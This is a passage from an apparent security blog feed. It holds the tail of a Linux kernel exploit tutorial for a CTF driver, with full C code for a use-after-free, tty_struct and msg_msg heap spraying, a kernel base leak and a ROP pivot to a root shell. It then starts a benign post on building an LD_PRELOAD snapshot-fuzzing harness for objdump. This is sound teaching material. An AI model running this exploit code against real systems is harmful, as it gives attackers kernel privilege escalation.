    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">pop_shell</span><span class="p">;</span> <span class="c1">// Return here</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span>   <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>

    <span class="cm">/* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */</span>

    <span class="c1">// Populate the 12 function pointers in the table that we have created.</span>
    <span class="c1">// There are 3 handlers that are invoked for allocated tty_structs when </span>
    <span class="c1">// their controlling process exits, they are close(), shutdown(),</span>
    <span class="c1">// and cleanup(). We have to overwrite these pointers for when we exit our</span>
    <span class="c1">// exploit process or else the kernel will panic with a RIP of </span>
    <span class="c1">// 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="n">rop_len</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">12</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// If i == 4, we're on the close() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">4</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 5, we're on the shutdown() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 6, we're on the cleanup() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Magic value for debugging</span>
        <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0xdeadbeefdeadbe00</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Put our gadget address as the ioctl() handler to pivot stack</span>
    <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="n">push_rdx</span><span class="p">;</span>

    <span class="c1">// Spray msg_msg's on the heap</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">curr_q</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fails</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fails</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if we have a reference to one of our msg_msg structs</span>
<span class="n">bool</span> <span class="nf">found_msg</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Read out the msg_msg</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">msg_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">msg_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read from holstein"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/</span> 

    <span class="c1">// Some heuristics to see if we indeed have a good msg_msg</span>
    <span class="kt">uint64_t</span> <span class="n">next</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">prev</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)];</span>
    <span class="kt">int64_t</span> <span class="n">m_type</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">];</span>

    <span class="c1">// Not one of our msg_msg structs</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">m_type</span> <span class="o">!=</span> <span class="mh">0x1337L</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We have to have valid pointers</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">prev</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// I think the pointers should be different as well</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="n">prev</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Found msg_msg struct:"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_list.next: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">next</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_list.prev: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">prev</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg.m_type: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">m_type</span><span class="p">);</span>

    <span class="c1">// Update rop address</span>
    <span class="n">rop_addr</span> <span class="o">=</span> <span class="mi">48</span> <span class="o">+</span> <span class="n">next</span><span class="p">;</span>
    
    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite the tty_struct-&gt;ops pointer with ROP address</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">fake_table</span><span class="p">;</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to write enough bytes to fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd1</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd2</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd3</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd4</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd5</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd6</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Saving user space state..."</span><span class="p">);</span>
    <span class="n">save_state</span><span class="p">();</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd1..."</span><span class="p">);</span>
    <span class="n">fd1</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd2</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd1</span><span class="p">);</span>

    <span class="c1">// Allocate '/dev/ptmx' structs until we allocate one in our free'd slab</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spraying tty_structs..."</span><span class="p">);</span>
    <span class="kt">size_t</span> <span class="n">p_remain</span> <span class="o">=</span> <span class="n">PTMX_SPRAY</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">p_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">alloc_ptmx</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; tty_struct(s) alloc'd: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">PTMX_SPRAY</span> <span class="o">-</span> <span class="n">p_remain</span><span class="p">);</span>

        <span class="c1">// Check to see if we found one of our tty_structs</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_ptmx</span><span class="p">(</span><span class="n">fd2</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">p_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find tty_struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Leaking tty_struct-&gt;ops..."</span><span class="p">);</span>
    <span class="n">base</span> <span class="o">=</span> <span class="n">leak_ops</span><span class="p">(</span><span class="n">fd2</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Kernel base: 0x%lx"</span><span class="p">,</span> <span class="n">base</span><span class="p">);</span>

    <span class="c1">// Clean up open fds</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Cleaning up our tty_structs..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_ptmx</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">num_ptmx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Solve the gadget addresses now that we have base</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Solving gadget addresses"</span><span class="p">);</span>
    <span class="n">solve_gadgets</span><span class="p">();</span>

    <span class="c1">// Create a hole for a msg_msg</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd3..."</span><span class="p">);</span>
    <span class="n">fd3</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd4</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd3</span><span class="p">);</span>

    <span class="c1">// Allocate msg_msg structs until we allocate one in our free'd slab</span>
    <span class="kt">size_t</span> <span class="n">q_remain</span> <span class="o">=</span> <span class="n">NUM_QUEUE</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">q_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Initialize a message queue for spraying msg_msg structs</span>
        <span class="n">init_msg_q</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; msg_msg queue(s) initialized: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">NUM_QUEUE</span> <span class="o">-</span> <span class="n">q_remain</span><span class="p">);</span>
        
        <span class="c1">// Spray messages for this queue</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">MSG_SPRAY</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="n">send_message</span><span class="p">();</span>
        <span class="p">}</span>

        <span class="c1">// Check to see if we found a msg_msg struct</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_msg</span><span class="p">(</span><span class="n">fd4</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        
        <span class="k">if</span> <span class="p">(</span><span class="n">q_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find msg_msg struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
    
    <span class="c1">// Solve our ROP chain address</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"`msgsnd()` failures: %lu"</span><span class="p">,</span> <span class="n">fails</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"ROP chain address: 0x%lx"</span><span class="p">,</span> <span class="n">rop_addr</span><span class="p">);</span>
    <span class="n">fake_table</span> <span class="o">=</span> <span class="n">rop_addr</span> <span class="o">+</span> <span class="n">rop_len</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Fake tty_struct-&gt;ops function table: 0x%lx"</span><span class="p">,</span> <span class="n">fake_table</span><span class="p">);</span>
    <span class="n">ioctl_ptr</span> <span class="o">=</span> <span class="n">fake_table</span> <span class="o">+</span> <span class="n">ioctl_off</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Fake ioctl() handler: 0x%lx"</span><span class="p">,</span> <span class="n">ioctl_ptr</span><span class="p">);</span>

    <span class="c1">// Do a 3rd UAF</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Freeing fd5..."</span><span class="p">);</span>
    <span class="n">fd5</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">fd6</span> <span class="o">=</span> <span class="n">open_device</span><span class="p">(</span><span class="n">DEV</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd5</span><span class="p">);</span>

    <span class="c1">// Spray more /dev/ptmx terminals</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spraying tty_structs..."</span><span class="p">);</span>
    <span class="n">p_remain</span> <span class="o">=</span> <span class="n">PTMX_SPRAY</span><span class="p">;</span>
    <span class="k">while</span><span class="p">(</span><span class="n">p_remain</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">alloc_ptmx</span><span class="p">();</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; tty_struct(s) alloc'd: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">PTMX_SPRAY</span> <span class="o">-</span> <span class="n">p_remain</span><span class="p">);</span>

        <span class="c1">// Check to see if we found a tty_struct</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">found_ptmx</span><span class="p">(</span><span class="n">fd6</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">p_remain</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Failed to find tty_struct"</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Found new tty_struct"</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting tty_struct-&gt;ops pointer with fake table..."</span><span class="p">);</span>
    <span class="n">overwrite_ops</span><span class="p">(</span><span class="n">fd6</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwrote tty_struct-&gt;ops"</span><span class="p">);</span>

    <span class="c1">// Spam IOCTL on all of our '/dev/ptmx' fds</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spamming `ioctl()`..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_ptmx</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ioctl</span><span class="p">(</span><span class="n">open_ptmx</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="mh">0xcafebabe</span><span class="p">,</span> <span class="n">rop_addr</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="c1">// pop rbp; ret;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux kernel" /><category term="Pwn" /><category term="UAF" /><category term="Tutorial" /><category term="CTF" /><category term="Walkthrough" /><summary type="html"><![CDATA[Introduction]]></summary></entry><entry><title type="html">Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness</title><link href="https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6/" rel="alternate" type="text/html" title="Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness" /><published>2022-04-02T00:00:00+00:00</published><updated>2022-04-02T00:00:00+00:00</updated><id>https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6</id><content type="html" xml:base="https://h0mbre.github.io/Fuzzing-Like-A-Caveman-6/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.</p>

<p>One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, as some would call in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase, an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.</p>

<p>This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.</p>

<p>However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which, we have source, but have gone through the sausage factory of enterprise build systems.</p>

<p>So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.</p>

<h2 id="target-easy-mode">Target (Easy Mode)</h2>
<p>For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.</p>

<h2 id="hello-world">Hello World</h2>
<p>The first step is to determine how we want to change objdump’s behavior. Let’s try running it under <code class="language-plaintext highlighter-rouge">strace</code> and disassemble <code class="language-plaintext highlighter-rouge">ls</code> and see how it behaves at the syscall level with <code class="language-plaintext highlighter-rouge">strace objdump -D /bin/ls</code>. What we’re looking for is the point where <code class="language-plaintext highlighter-rouge">objdump</code> starts interacting with our input, <code class="language-plaintext highlighter-rouge">/bin/ls</code> in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of <code class="language-plaintext highlighter-rouge">/bin/ls</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
</code></pre></div></div>
<p><strong><em>Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you running a different objdump than you. But the point of the blogpost is to just show concepts that you can be creative on your own.</em></strong></p>

<p>I also noticed that the program doesn’t close our input file until the end of execution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++
</code></pre></div></div>

<p>This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or <code class="language-plaintext highlighter-rouge">mmap()</code> the input file. It is continuously reading from the file throughout the <code class="language-plaintext highlighter-rouge">strace</code> output.</p>

<p>Since we don’t have source code for the target, we’re going to affect behavior by using an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object. By using an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code>, this would be a good stopping point to go Google around for more information <a href="https://tbrindus.ca/correct-ld-preload-hooking-libc/">great starting point</a>. For starters, let’s just get a <em>Hello, World!</em> shared object loaded.</p>

<p>We can utilize <code class="language-plaintext highlighter-rouge">gcc</code> <a href="https://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html">Function Attributes</a> to have our shared object execute code when it is loaded by the target by leveraging the <code class="language-plaintext highlighter-rouge">constructor</code> attribute.</p>

<p>So our code so far will look like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** LD_PRELOAD shared object loaded!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.</p>

<p>We can now use the <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> environment variable and run objdump with our shared object which should print when loaded:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls &gt; /tmp/output.txt &amp;&amp; head -n 20 /tmp/output.txt
**&gt; LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64


Disassembly of section .interp:

0000000000000238 &lt;.interp&gt;:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 &lt;_init@@Base-0x34e3&gt;
 248:   78 38                   js     282 &lt;_init@@Base-0x34d6&gt;
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:
</code></pre></div></div>

<p>It works, now we can start looking for functions to hook.</p>

<h2 id="looking-for-hooks">Looking for Hooks</h2>
